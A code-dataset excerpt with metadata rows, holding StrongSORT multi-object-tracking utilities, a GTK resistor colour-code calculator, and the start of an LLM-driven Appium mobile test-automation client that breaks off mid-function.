if track_id < 0:
continue
x1, y1, w, h = tlwh
x2, y2 = x1 + w, y1 + h
line = save_format.format(frame=frame_id, id=track_id, x1=x1, y1=y1, x2=x2, y2=y2, w=w, h=h)
f.write(line)
# def write_results(filename, results_dict: Dict, data_type: str):
# if not filename:
# return
# path = os.path.dirname(filename)
# if not os.path.exists(path):
# os.makedirs(path)
# if data_type in ('mot', 'mcmot', 'lab'):
# save_format = '{frame},{id},{x1},{y1},{w},{h},1,-1,-1,-1\n'
# elif data_type == 'kitti':
# save_format = '{frame} {id} pedestrian -1 -1 -10 {x1} {y1} {x2} {y2} -1 -1 -1 -1000 -1000 -1000 -10 {score}\n'
# else:
# raise ValueError(data_type)
# with open(filename, 'w') as f:
# for frame_id, frame_data in results_dict.items():
# if data_type == 'kitti':
# frame_id -= 1
# for tlwh, track_id in frame_data:
# if track_id < 0:
# continue
# x1, y1, w, h = tlwh
# x2, y2 = x1 + w, y1 + h
# line = save_format.format(frame=frame_id, id=track_id, x1=x1, y1=y1, x2=x2, y2=y2, w=w, h=h, score=1.0)
# f.write(line)
# logger.info('Save results to {}'.format(filename))
def read_results(filename, data_type: str, is_gt=False, is_ignore=False):
if data_type in ('mot', 'lab'):
read_fun = read_mot_results
else:
raise ValueError('Unknown data type: {}'.format(data_type))
return read_fun(filename, is_gt, is_ignore)
"""
labels={'ped', ... % 1
'person_on_vhcl', ... % 2
'car', ... % 3
'bicycle', ... % 4
'mbike', ... % 5
'non_mot_vhcl', ... % 6
'static_person', ... % 7
'distractor', ... % 8
'occluder', ... % 9
'occluder_on_grnd', ... %10
'occluder_full', ... % 11
'reflection', ... % 12
'crowd' ... % 13
};
"""
def read_mot_results(filename, is_gt, is_ignore):
valid_labels = {1}
ignore_labels = {2, 7, 8, 12}
results_dict = dict()
if os.path.isfile(filename):
with open(filename, 'r') as f:
for line in f.readlines():
linelist = line.split(',')
if len(linelist) < 7:
continue
fid = int(linelist[0])
if fid < 1:
continue
results_dict.setdefault(fid, list())
if is_gt:
if 'MOT16-' in filename or 'MOT17-' in filename:
label = int(float(linelist[7]))
mark = int(float(linelist[6]))
if mark == 0 or label not in valid_labels:
continue
score = 1
elif is_ignore:
if 'MOT16-' in filename or 'MOT17-' in filename:
label = int(float(linelist[7]))
vis_ratio = float(linelist[8])
if label not in ignore_labels and vis_ratio >= 0:
continue
else:
continue
score = 1
else:
score = float(linelist[6])
tlwh = tuple(map(float, linelist[2:6]))
target_id = int(linelist[1])
results_dict[fid].append((tlwh, target_id, score))
return results_dict
def unzip_objs(objs):
if len(objs) > 0:
tlwhs, ids, scores = zip(*objs)
else:
tlwhs, ids, scores = [], [], []
tlwhs = np.asarray(tlwhs, dtype=float).reshape(-1, 4)
return tlwhs, ids, scores | 4,357 | Python | .py | 111 | 30.423423 | 121 | 0.493491 | TheNobody-12/MOT_WITH_YOLOV9_STRONG_SORT | 8 | 1 | 1 | GPL-3.0 | 9/5/2024, 10:48:26 PM (Europe/Amsterdam) |
2,288,123 | evaluation.py | TheNobody-12_MOT_WITH_YOLOV9_STRONG_SORT/strong_sort/utils/evaluation.py | import os
import numpy as np
import copy
import motmetrics as mm
mm.lap.default_solver = 'lap'
from utils.io import read_results, unzip_objs
class Evaluator(object):
def __init__(self, data_root, seq_name, data_type):
self.data_root = data_root
self.seq_name = seq_name
self.data_type = data_type
self.load_annotations()
self.reset_accumulator()
def load_annotations(self):
assert self.data_type == 'mot'
gt_filename = os.path.join(self.data_root, self.seq_name, 'gt', 'gt.txt')
self.gt_frame_dict = read_results(gt_filename, self.data_type, is_gt=True)
self.gt_ignore_frame_dict = read_results(gt_filename, self.data_type, is_ignore=True)
def reset_accumulator(self):
self.acc = mm.MOTAccumulator(auto_id=True)
def eval_frame(self, frame_id, trk_tlwhs, trk_ids, rtn_events=False):
# results
trk_tlwhs = np.copy(trk_tlwhs)
trk_ids = np.copy(trk_ids)
# gts
gt_objs = self.gt_frame_dict.get(frame_id, [])
gt_tlwhs, gt_ids = unzip_objs(gt_objs)[:2]
# ignore boxes
ignore_objs = self.gt_ignore_frame_dict.get(frame_id, [])
ignore_tlwhs = unzip_objs(ignore_objs)[0]
# remove ignored results
keep = np.ones(len(trk_tlwhs), dtype=bool)
iou_distance = mm.distances.iou_matrix(ignore_tlwhs, trk_tlwhs, max_iou=0.5)
if len(iou_distance) > 0:
match_is, match_js = mm.lap.linear_sum_assignment(iou_distance)
match_is, match_js = map(lambda a: np.asarray(a, dtype=int), [match_is, match_js])
match_ious = iou_distance[match_is, match_js]
match_js = np.asarray(match_js, dtype=int)
match_js = match_js[np.logical_not(np.isnan(match_ious))]
keep[match_js] = False
trk_tlwhs = trk_tlwhs[keep]
trk_ids = trk_ids[keep]
# get distance matrix
iou_distance = mm.distances.iou_matrix(gt_tlwhs, trk_tlwhs, max_iou=0.5)
# acc
self.acc.update(gt_ids, trk_ids, iou_distance)
if rtn_events and iou_distance.size > 0 and hasattr(self.acc, 'last_mot_events'):
events = self.acc.last_mot_events # only supported by https://github.com/longcw/py-motmetrics
else:
events = None
return events
def eval_file(self, filename):
self.reset_accumulator()
result_frame_dict = read_results(filename, self.data_type, is_gt=False)
frames = sorted(list(set(self.gt_frame_dict.keys()) | set(result_frame_dict.keys())))
for frame_id in frames:
trk_objs = result_frame_dict.get(frame_id, [])
trk_tlwhs, trk_ids = unzip_objs(trk_objs)[:2]
self.eval_frame(frame_id, trk_tlwhs, trk_ids, rtn_events=False)
return self.acc
@staticmethod
def get_summary(accs, names, metrics=('mota', 'num_switches', 'idp', 'idr', 'idf1', 'precision', 'recall')):
names = copy.deepcopy(names)
if metrics is None:
metrics = mm.metrics.motchallenge_metrics
metrics = copy.deepcopy(metrics)
mh = mm.metrics.create()
summary = mh.compute_many(
accs,
metrics=metrics,
names=names,
generate_overall=True
)
return summary
@staticmethod
def save_summary(summary, filename):
import pandas as pd
writer = pd.ExcelWriter(filename)
summary.to_excel(writer)
writer.save()
| 3,532 | Python | .py | 80 | 35.1125 | 112 | 0.619131 | TheNobody-12/MOT_WITH_YOLOV9_STRONG_SORT | 8 | 1 | 1 | GPL-3.0 | 9/5/2024, 10:48:26 PM (Europe/Amsterdam) |
2,288,124 | draw.py | TheNobody-12_MOT_WITH_YOLOV9_STRONG_SORT/strong_sort/utils/draw.py | import numpy as np
import cv2
palette = (2 ** 11 - 1, 2 ** 15 - 1, 2 ** 20 - 1)
def compute_color_for_labels(label):
"""
Simple function that adds fixed color depending on the class
"""
color = [int((p * (label ** 2 - label + 1)) % 255) for p in palette]
return tuple(color)
def draw_boxes(img, bbox, identities=None, offset=(0,0)):
for i,box in enumerate(bbox):
x1,y1,x2,y2 = [int(i) for i in box]
x1 += offset[0]
x2 += offset[0]
y1 += offset[1]
y2 += offset[1]
# box text and bar
id = int(identities[i]) if identities is not None else 0
color = compute_color_for_labels(id)
label = '{}{:d}'.format("", id)
t_size = cv2.getTextSize(label, cv2.FONT_HERSHEY_PLAIN, 2 , 2)[0]
cv2.rectangle(img,(x1, y1),(x2,y2),color,3)
cv2.rectangle(img,(x1, y1),(x1+t_size[0]+3,y1+t_size[1]+4), color,-1)
cv2.putText(img,label,(x1,y1+t_size[1]+4), cv2.FONT_HERSHEY_PLAIN, 2, [255,255,255], 2)
return img
if __name__ == '__main__':
for i in range(82):
print(compute_color_for_labels(i))
| 1,125 | Python | .py | 28 | 33.607143 | 95 | 0.577594 | TheNobody-12/MOT_WITH_YOLOV9_STRONG_SORT | 8 | 1 | 1 | GPL-3.0 | 9/5/2024, 10:48:26 PM (Europe/Amsterdam) |
2,288,125 | asserts.py | TheNobody-12_MOT_WITH_YOLOV9_STRONG_SORT/strong_sort/utils/asserts.py | from os import environ
def assert_in(file, files_to_check):
if file not in files_to_check:
raise AssertionError("{} does not exist in the list".format(str(file)))
return True
def assert_in_env(check_list: list):
for item in check_list:
assert_in(item, environ.keys())
return True
| 316 | Python | .py | 9 | 30.111111 | 79 | 0.693069 | TheNobody-12/MOT_WITH_YOLOV9_STRONG_SORT | 8 | 1 | 1 | GPL-3.0 | 9/5/2024, 10:48:26 PM (Europe/Amsterdam) |
2,288,126 | log.py | TheNobody-12_MOT_WITH_YOLOV9_STRONG_SORT/strong_sort/utils/log.py | import logging
def get_logger(name='root'):
formatter = logging.Formatter(
# fmt='%(asctime)s [%(levelname)s]: %(filename)s(%(funcName)s:%(lineno)s) >> %(message)s')
fmt='%(asctime)s [%(levelname)s]: %(message)s', datefmt='%Y-%m-%d %H:%M:%S')
handler = logging.StreamHandler()
handler.setFormatter(formatter)
logger = logging.getLogger(name)
logger.setLevel(logging.INFO)
logger.addHandler(handler)
return logger
| 463 | Python | .py | 11 | 36.545455 | 98 | 0.661435 | TheNobody-12/MOT_WITH_YOLOV9_STRONG_SORT | 8 | 1 | 1 | GPL-3.0 | 9/5/2024, 10:48:26 PM (Europe/Amsterdam) |
2,288,127 | tools.py | TheNobody-12_MOT_WITH_YOLOV9_STRONG_SORT/strong_sort/utils/tools.py | from functools import wraps
from time import time
def is_video(ext: str):
"""
Returns true if ext exists in
allowed_exts for video files.
Args:
ext:
Returns:
"""
allowed_exts = ('.mp4', '.webm', '.ogg', '.avi', '.wmv', '.mkv', '.3gp')
return any((ext.endswith(x) for x in allowed_exts))
def tik_tok(func):
"""
keep track of time for each process.
Args:
func:
Returns:
"""
@wraps(func)
def _time_it(*args, **kwargs):
start = time()
try:
return func(*args, **kwargs)
finally:
end_ = time()
print("time: {:.03f}s, fps: {:.03f}".format(end_ - start, 1 / (end_ - start)))
return _time_it
| 734 | Python | .py | 28 | 19.821429 | 90 | 0.541007 | TheNobody-12/MOT_WITH_YOLOV9_STRONG_SORT | 8 | 1 | 1 | GPL-3.0 | 9/5/2024, 10:48:26 PM (Europe/Amsterdam) |
2,288,128 | parser.py | TheNobody-12_MOT_WITH_YOLOV9_STRONG_SORT/strong_sort/utils/parser.py | import os
import yaml
from easydict import EasyDict as edict
class YamlParser(edict):
"""
This is yaml parser based on EasyDict.
"""
def __init__(self, cfg_dict=None, config_file=None):
if cfg_dict is None:
cfg_dict = {}
if config_file is not None:
assert(os.path.isfile(config_file))
with open(config_file, 'r') as fo:
yaml_ = yaml.load(fo.read(), Loader=yaml.FullLoader)
cfg_dict.update(yaml_)
super(YamlParser, self).__init__(cfg_dict)
def merge_from_file(self, config_file):
with open(config_file, 'r') as fo:
yaml_ = yaml.load(fo.read(), Loader=yaml.FullLoader)
self.update(yaml_)
def merge_from_dict(self, config_dict):
self.update(config_dict)
def get_config(config_file=None):
return YamlParser(config_file=config_file)
if __name__ == "__main__":
cfg = YamlParser(config_file="../configs/yolov3.yaml")
cfg.merge_from_file("../configs/strong_sort.yaml")
import ipdb
ipdb.set_trace()
| 1,078 | Python | .py | 29 | 29.689655 | 68 | 0.620058 | TheNobody-12/MOT_WITH_YOLOV9_STRONG_SORT | 8 | 1 | 1 | GPL-3.0 | 9/5/2024, 10:48:26 PM (Europe/Amsterdam) |
2,288,129 | window.py | oyajun_color-code/src/window.py | # window.py
#
# Copyright 2024 oyajun
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
# SPDX-License-Identifier: GPL-3.0-or-later
from gi.repository import Adw, Gtk, Gdk, Gio, GObject
import decimal
@Gtk.Template(resource_path='/com/oyajun/ColorCode/window.ui')
class ColorCodeWindow(Adw.ApplicationWindow):
__gtype_name__ = 'ColorCodeWindow'
drop_down_1 = Gtk.Template.Child()
drop_down_2 = Gtk.Template.Child()
drop_down_3 = Gtk.Template.Child()
drop_down_4 = Gtk.Template.Child()
result_label = Gtk.Template.Child()
copy_button = Gtk.Template.Child()
clipboard = Gdk.Display.get_default().get_clipboard()
def __init__(self, **kwargs):
super().__init__(**kwargs)
list_store_expression = Gtk.PropertyExpression.new(
KeyValuePair,
None,
'value',
)
value_model = Gio.ListStore(item_type=KeyValuePair)
value_model.splice(
0, 0,
[
KeyValuePair(key='0', value=_('⬛ Black')),
KeyValuePair(key='1', value=_('🟫 Brown')),
KeyValuePair(key='2', value=_('🟥 Red')),
KeyValuePair(key='3', value=_('🟧 Orange')),
KeyValuePair(key='4', value=_('🟨 Yellow')),
KeyValuePair(key='5', value=_('🟩 Green')),
KeyValuePair(key='6', value=_('🟦 Blue')),
KeyValuePair(key='7', value=_('🟪 Violet')),
KeyValuePair(key='8', value=_('🩶 Gray')),
KeyValuePair(key='9', value=_('⬜ White')),
],
)
multiplier_model = Gio.ListStore(item_type=KeyValuePair)
multiplier_model.splice(
0, 0,
[
KeyValuePair(key='0', value=_('⬛ Black')),
KeyValuePair(key='1', value=_('🟫 Brown')),
KeyValuePair(key='2', value=_('🟥 Red')),
KeyValuePair(key='3', value=_('🟧 Orange')),
KeyValuePair(key='4', value=_('🟨 Yellow')),
KeyValuePair(key='5', value=_('🟩 Green')),
KeyValuePair(key='6', value=_('🟦 Blue')),
KeyValuePair(key='7', value=_('🟪 Violet')),
KeyValuePair(key='8', value=_('🩶 Gray')),
KeyValuePair(key='9', value=_('⬜ White')),
KeyValuePair(key='-1', value=_('🥇 Gold')),
KeyValuePair(key='-2', value=_('🥈 Silver')),
KeyValuePair(key='-3', value=_('🩷 Pink')),
],
)
tolerance_model = Gio.ListStore(item_type=KeyValuePair)
tolerance_model.splice(
0, 0,
[
KeyValuePair(key='1', value=_('🟫 Brown')),
KeyValuePair(key='2', value=_('🟥 Red')),
KeyValuePair(key='0.05', value=_('🟧 Orange')),
KeyValuePair(key='0.5', value=_('🟩 Green')),
KeyValuePair(key='0.25', value=_('🟦 Blue')),
KeyValuePair(key='0.1', value=_('🟪 Violet')),
KeyValuePair(key='5', value=_('🥇 Gold')),
KeyValuePair(key='10', value=_('🥈 Silver')),
],
)
self.drop_down_1.set_expression(list_store_expression)
self.drop_down_2.set_expression(list_store_expression)
self.drop_down_3.set_expression(list_store_expression)
self.drop_down_4.set_expression(list_store_expression)
self.drop_down_1.set_model(value_model)
self.drop_down_2.set_model(value_model)
self.drop_down_3.set_model(multiplier_model)
self.drop_down_4.set_model(tolerance_model)
self.drop_down_1.connect('notify::selected-item', self.on_selected_item)
self.drop_down_2.connect('notify::selected-item', self.on_selected_item)
self.drop_down_3.connect('notify::selected-item', self.on_selected_item)
self.drop_down_4.connect('notify::selected-item', self.on_selected_item)
# init
self.drop_down_1.set_selected(1)
self.drop_down_2.set_selected(0)
self.drop_down_3.set_selected(2)
self.drop_down_4.set_selected(6)
self.calculate()
self.copy_button.connect('clicked', self.copy_text)
def copy_text(self, _button):
self.clipboard.set(self.result_label.get_label())
def on_selected_item(self, _drop_down, _selected_item):
selected_item = _drop_down.get_selected_item()
self.calculate()
def calculate(self):
value1 = decimal.Decimal(self.drop_down_1.get_selected_item().key)
value2 = decimal.Decimal(self.drop_down_2.get_selected_item().key)
multiplier = decimal.Decimal(self.drop_down_3.get_selected_item().key)
tolerance = self.drop_down_4.get_selected_item().key
value = (value1*10 + value2) * decimal.Decimal('10') ** multiplier
print(value)
print(convert_to_MKG(value))
# × U+00D7
value_str = f'{value1*10 + value2} × 10^{multiplier}Ω ±{tolerance}%'
print(value_str)
value_display = f'{convert_to_MKG(value)}Ω ±{tolerance}%'
self.result_label.set_label(str = value_display)
def convert_to_MKG(value):
if value < 1000:
return delete_zero(value)
elif value < 1000000:
return delete_zero(value/1000) + 'K'
elif value < 1000000000:
return delete_zero(value/1000000) + 'M'
elif value < 1000000000000:
return delete_zero(value/1000000000) + 'G'
def delete_zero(value):
if value % decimal.Decimal('1') == 0: # the value has .0
return str(int(value))
elif value % decimal.Decimal('0.1') == 0:
return str(value.quantize(decimal.Decimal('1.0')))
elif value % decimal.Decimal('0.01') == 0:
return str(value.quantize(decimal.Decimal('1.00')))
elif value % decimal.Decimal('0.001') == 0:
return str(value.quantize(decimal.Decimal('1.000')))
else:
return str(value)
class KeyValuePair(GObject.Object):
key = GObject.Property(
type=str,
flags=GObject.ParamFlags.READWRITE,
)
value = GObject.Property(
type=str,
nick='Value',
blurb='Value',
flags=GObject.ParamFlags.READWRITE,
default='',
)
| 6,894 | Python | .py | 155 | 35.341935 | 80 | 0.599494 | oyajun/color-code | 8 | 7 | 3 | GPL-3.0 | 9/5/2024, 10:48:26 PM (Europe/Amsterdam) |
2,288,130 | main.py | oyajun_color-code/src/main.py | # main.py
#
# Copyright 2024 oyajun
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
# SPDX-License-Identifier: GPL-3.0-or-later
import sys
import gi
gi.require_version('Gtk', '4.0')
gi.require_version('Adw', '1')
from gi.repository import Gtk, Gio, Adw
from .window import ColorCodeWindow
from gettext import gettext
class ColorCodeApplication(Adw.Application):
"""The main application singleton class."""
def __init__(self):
super().__init__(application_id='com.oyajun.ColorCode',
flags=Gio.ApplicationFlags.DEFAULT_FLAGS)
self.create_action('quit', lambda *_: self.quit(), ['<primary>q'])
self.create_action('about', self.on_about_action)
self.create_action('preferences', self.on_preferences_action)
def do_activate(self):
"""Called when the application is activated.
We raise the application's main window, creating it if
necessary.
"""
win = self.props.active_window
if not win:
win = ColorCodeWindow(application=self)
win.present()
def on_about_action(self, widget, _unused):
"""Callback for the app.about action."""
about = Adw.AboutWindow(transient_for=self.props.active_window,
application_name= _('Color Code'),
application_icon='com.oyajun.ColorCode',
developer_name='oyajun',
version='0.1.4',
developers=['oyajun','Alex K','FineFindus','Mr-TBNR-BliTzz'],
license_type=Gtk.License.GPL_3_0,
# Tranlator Credits: Add your name.
# Example)
# oyajun <[email protected]>\n
# joe <[email protected]>
translator_credits=_('translator_credits'),
copyright='© 2024 oyajun')
about.present()
def on_preferences_action(self, widget, _):
"""Callback for the app.preferences action."""
print('app.preferences action activated')
def create_action(self, name, callback, shortcuts=None):
"""Add an application action.
Args:
name: the name of the action
callback: the function to be called when the action is
activated
shortcuts: an optional list of accelerators
"""
action = Gio.SimpleAction.new(name, None)
action.connect("activate", callback)
self.add_action(action)
if shortcuts:
self.set_accels_for_action(f"app.{name}", shortcuts)
def main(version):
"""The application's entry point."""
app = ColorCodeApplication()
return app.run(sys.argv)
| 3,445 | Python | .py | 78 | 33.961538 | 93 | 0.612172 | oyajun/color-code | 8 | 7 | 3 | GPL-3.0 | 9/5/2024, 10:48:26 PM (Europe/Amsterdam) |
2,288,131 | client.py | qaml-ai_qaml-python/qaml/client.py | from appium import webdriver
from appium.options.ios import XCUITestOptions
from appium.options.android import UiAutomator2Options
from appium.webdriver.common.appiumby import AppiumBy
import re
import time
import base64
import subprocess
import json
from PIL import Image
from io import BytesIO
import requests
import os
import xml.etree.ElementTree as ET
class QAMLExecException(Exception):
pass
class BaseClient:
def __init__(self, api_key, api_base_url="https://api.camelqa.com"):
self.api_key = api_key or os.environ.get("QAML_API_KEY")
self.api_base_url = os.environ.get("QAML_API_BASE_URL", api_base_url)
self.driver = None
self.platform = None
self.screen_size = None
self.use_accessibility_elements = False
self.req_session = requests.Session()
self.req_session.headers.update({"Authorization": f"Bearer {api_key}"})
self.system_prompt = None
self.available_functions = {
"tap": self.tap_coordinates,
"drag": self.drag,
"swipe": self.swipe,
"scroll": self.scroll,
"type_text": self.type_text,
"sleep": self.sleep,
"report_error": self.report_error
}
def setup_driver(self):
raise NotImplementedError
def tap_coordinates(self, x, y):
raise NotImplementedError
def drag(self, startX, startY, endX, endY):
raise NotImplementedError
def swipe(self, direction):
raise NotImplementedError
def scroll(self, direction):
raise NotImplementedError
def type_text(self, text):
raise NotImplementedError
def sleep(self, duration):
time.sleep(duration)
def report_error(self, reason):
raise QAMLExecException(reason)
def get_screenshot(self):
screenshot = self.driver.get_screenshot_as_base64()
PIL_image = Image.open(BytesIO(base64.b64decode(screenshot)))
longer_side = max(PIL_image.size)
aspect_ratio = PIL_image.size[0] / PIL_image.size[1]
new_size = (960, int(960 / aspect_ratio)) if PIL_image.size[0] == longer_side else (int(960 * aspect_ratio), 960)
PIL_image = PIL_image.resize(new_size)
buffered = BytesIO()
PIL_image.save(buffered, format="PNG")
screenshot = base64.b64encode(buffered.getvalue()).decode("utf-8")
return screenshot
def _execute_function(self, function_name, **kwargs):
function = self.available_functions.get(function_name)
if function:
function(**kwargs)
def get_accessibility_elements(self, use_accessibility_elements=False):
if (not self.use_accessibility_elements and not use_accessibility_elements):
return []
appium_page_source = self.driver.page_source
root = ET.fromstring(appium_page_source)
accessibility_elements = root.findall(".//*[@accessible='true']")
accessibility_elements = [element for element in accessibility_elements if element.tag != "XCUIElementTypeStaticText" and element.tag != "android.widget.TextView" and element.tag != "XCUIElementTypeKey"]
accessibility_elements = [{"left": int(element.attrib["x"]), "top": int(element.attrib["y"]), "width": int(element.attrib["width"]), "height": int(element.attrib["height"]), "type": element.attrib["type"], "label": element.attrib.get("label", "")} for element in accessibility_elements]
# remove elements with no label
accessibility_elements = [element for element in accessibility_elements if element["label"] and element["label"].strip()]
return accessibility_elements
def execute(self, script):
if not script.strip():
return
screenshot = self.get_screenshot()
accessibility_elements = self.get_accessibility_elements()
payload = {"action": script, "screen_size": self.screen_size, "screenshot": screenshot, "platform": self.platform, "extra_context": self.system_prompt, "accessibility_elements": accessibility_elements}
response = self.req_session.post(f"{self.api_base_url}/v1/execute", json=payload, headers={"Authorization": f"Bearer {self.api_key}"})
print(f"Action: {script} - Response: {response.text}")
try:
actions = response.json()
for action in actions:
self._execute_function(action["name"], **json.loads(action["arguments"]))
time.sleep(0.5)
except Exception as e:
print(e)
pass
def assert_condition(self, script):
screenshot = self.get_screenshot()
payload = {"assertion": script, "screen_size": self.screen_size, "screenshot": screenshot, "platform": self.platform, "extra_context": self.system_prompt}
response = self.req_session.post(f"{self.api_base_url}/v1/assert", json=payload, headers={"Authorization": f"Bearer {self.api_key}"})
print(f"Action: {script} - Response: {response.text}")
assertion = response.json()[0]
args = json.loads(assertion["arguments"])
if args.get("result") == False:
raise QAMLExecException(f"Assertion failed: {script}. Reason: {args['reason']}")
return response.json()
def task(self, task, max_steps=10):
progress = []
iterations = 0
yield f"Task: {task}"
while True:
if iterations >= max_steps:
raise QAMLExecException(f"Task execution took too many steps. Max steps: {max_steps}")
iterations += 1
time.sleep(0.5)
screenshot = self.get_screenshot()
accessibility_elements = self.get_accessibility_elements()
payload = {"task": task, "progress": progress, "platform": self.platform, "screenshot": screenshot, "extra_context": self.system_prompt, "screen_size": self.screen_size, "accessibility_elements": accessibility_elements}
response = self.req_session.post(f"{self.api_base_url}/v1/execute-task", json=payload)
response_json = response.json()
function_called = False
completed = False
for function in response_json:
args = json.loads(function["arguments"])
if function["name"] == "update_progress":
yield f"Progress: {args['progress']}"
progress.append(args["progress"])
continue
if function["name"] == "task_completed":
if args["result"] == "success":
completed = True
else:
raise QAMLExecException(f"Task execution failed. Progress: {progress}")
function_called = True
self._execute_function(function["name"], **args)
yield f"{function['name']}({args})"
progress.append(f'{function["name"]}({args})')
if completed:
break
if not function_called:
pass
#raise QAMLExecException("Task execution failed. No function called.")
class AndroidClient(BaseClient):
def __init__(self, api_key, driver=None):
super().__init__(api_key)
self.platform = "Android"
if driver:
self.driver = driver
else:
max_retry = 3
for i in range(max_retry):
try:
self.setup_driver()
break
except Exception as e:
if i == max_retry - 1:
raise e
self.screen_size = self.driver.get_window_size()
def setup_driver(self):
caps = {'deviceName': 'Android Device', 'automationName': 'UiAutomator2', 'autoGrantPermissions': True,
'newCommandTimeout': 600, 'mjpegScreenshotUrl': "http://localhost:4723/stream.mjpeg"}
options = UiAutomator2Options().load_capabilities(caps)
def create_driver(options):
try:
return webdriver.Remote('http://localhost:4723', options=options)
except:
return webdriver.Remote('http://localhost:4723/wd/hub', options=options)
try:
self.driver = webdriver.Remote('http://localhost:4723', options=options)
except:
# Try again without mjpeg-consumer dependency
caps.pop('mjpegScreenshotUrl')
options = UiAutomator2Options().load_capabilities(caps)
self.driver = create_driver(options)
self.driver.start_recording_screen()
self.driver.update_settings({'waitForIdleTimeout': 0, 'shouldWaitForQuiescence': False, 'maxTypingFrequency': 60})
# get screenshot to test if the driver is working
self.driver.get_screenshot_as_base64()
def tap_coordinates(self, x, y):
self.driver.tap([(x, y)], 1)
def drag(self, startX, startY, endX, endY):
self.driver.swipe(startX, startY, endX, endY, 1)
def swipe(self, direction):
left = self.window_size["width"] * 0.2
top = self.window_size["height"] * 0.2
width = self.window_size["width"] * 0.6
height = self.window_size["height"] * 0.6
self.driver.execute_script("mobile: swipeGesture", {"left": left, "top": top, "width": width, "height": height, "direction": direction, "percent": 1.0})
def scroll(self, direction):
direction_map = {"up": "down", "down": "up", "left": "right", "right": "left"}
self.swipe(direction_map[direction])
def type_text(self, text):
self.driver.execute_script("mobile: shell", {"command": f"input text '{text}'"})
class IOSClient(BaseClient):
def __init__(self, api_key, driver=None, use_mjpeg=True, udid=None):
super().__init__(api_key)
self.available_functions["switch_to_app"] = self.switch_to_app
self.platform = "iOS"
self.use_mjpeg = use_mjpeg
self.udid = udid
if driver:
self.driver = driver
else:
def get_ios_udid():
if udid:
return udid
system_profiler_output = subprocess.run(["system_profiler", "SPUSBDataType"], capture_output=True, text=True).stdout
serial_numbers = re.findall(r'(iPhone|iPad).*?Serial Number: *([^\n]+)', system_profiler_output, re.DOTALL)
if serial_numbers:
first_serial_number = serial_numbers[0][1].strip()
modified_serial_number = first_serial_number[:8] + '-' + first_serial_number[8:]
return modified_serial_number
ios_udid = get_ios_udid()
# try 3 times to setup the driver
for _ in range(3):
try:
self.setup_driver(ios_udid)
break
except:
pass
else:
raise Exception("Failed to setup the driver.")
self.screen_size = self.driver.get_window_size()
def setup_driver(self, udid):
options = XCUITestOptions()
if udid:
options.udid = udid
options.new_command_timeout = 60 * 5 # 5 minutes
if self.use_mjpeg:
custom_caps = {"mjpegScreenshotUrl": "http://localhost:9100"}
options.load_capabilities(custom_caps)
def create_driver(options):
try:
return webdriver.Remote('http://localhost:4723', options=options)
except:
return webdriver.Remote('http://localhost:4723/wd/hub', options=options)
try:
self.driver = create_driver(options)
except:
# Try again without mjpeg-consumer dependency
options = XCUITestOptions()
options.udid = udid
self.driver = create_driver(options)
if self.use_mjpeg:
print("Using MJPEG screenshot.")
self.driver.start_recording_screen(forceRestart=True)
self.driver.update_settings({'waitForIdleTimeout': 0, 'shouldWaitForQuiescence': False, 'maxTypingFrequency': 60})
# get screenshot to test if the driver is working
self.driver.get_screenshot_as_base64()
def tap_coordinates(self, x, y):
self.driver.execute_script("mobile: tap", {"x": x, "y": y})
def drag(self, startX, startY, endX, endY):
self.driver.execute_script("mobile: dragFromToForDuration", {"fromX": startX, "fromY": startY, "toX": endX, "toY": endY, "duration": 1})
def swipe(self, direction):
self.driver.execute_script("mobile: swipe", {"direction": direction})
def scroll(self, direction):
direction_map = {"up": "down", "down": "up", "left": "right", "right": "left"}
self.driver.execute_script("mobile: swipe", {"direction": direction_map[direction]})
def type_text(self, text):
if self.use_hid_typing:
self.type_text_hid(text)
else:
try:
self.driver.find_element(AppiumBy.IOS_PREDICATE, "type == 'XCUIElementTypeApplication'").send_keys(text)
except:
self.type_text_hid(text)
def type_text_hid(self, text):
special_chars = {
' ': 0x2C, '!': 0x1E, '@': 0x1F, '#': 0x20, '$': 0x21, '%': 0x22,
'^': 0x23, '&': 0x24, '*': 0x25, '(': 0x26, ')': 0x27, '-': 0x2D,
'_': 0x2D, '=': 0x2E, '+': 0x2E, '[': 0x2F, '{': 0x2F, ']': 0x30,
'}': 0x30, '\\': 0x31, '|': 0x31, ';': 0x33, ':': 0x33, '\'': 0x34,
'"': 0x34, '`': 0x35, '~': 0x35, ',': 0x36, '<': 0x36, '.': 0x37,
'>': 0x37, '/': 0x38, '?': 0x38
}
# Base HID usage codes
hid_base_lower = 0x04 # HID usage for 'a'
hid_base_upper = 0x04 # HID usage for 'A'
hid_base_number = 0x1E # HID usage for '1'
for char in text:
usage = None
shift = False
if 'a' <= char <= 'z':
usage = hid_base_lower + (ord(char) - ord('a'))
elif 'A' <= char <= 'Z':
usage = hid_base_upper + (ord(char) - ord('A'))
shift = True
elif '1' <= char <= '9':
usage = hid_base_number + (ord(char) - ord('1'))
elif char == '0':
usage = 0x27
elif char in special_chars:
usage = special_chars[char]
# Determine if shift needs to be pressed for special characters
shift = char in '~!@#$%^&*()_+{}|:"<>?'
if usage is None:
continue
self.driver.execute_script("mobile: performIoHidEvent", {"page": 0x07, "usage": usage, "durationSeconds": 0.005}) # Key down
self.driver.execute_script("mobile: performIoHidEvent", {"page": 0x07, "usage": 0x00, "durationSeconds": 0.005}) # Key up
def switch_to_app(self, bundle_id):
self.driver.activate_app(bundle_id)
def Client(api_key, driver=None, use_mjpeg=True, use_hid_typing=False, use_accessibility_elements=False, udid=None):
def get_connected_android_devices():
try:
result = subprocess.run(["adb", "devices"], capture_output=True, text=True)
devices = result.stdout.splitlines()[1:] # Skip the first line, which is a header
connected_devices = [line.split('\t')[0] for line in devices if "device" in line]
return connected_devices
except:
return []
if driver is not None:
platform_name = driver.capabilities.get("platformName").lower()
if platform_name == 'android':
print("Using the provided Appium driver for Android.")
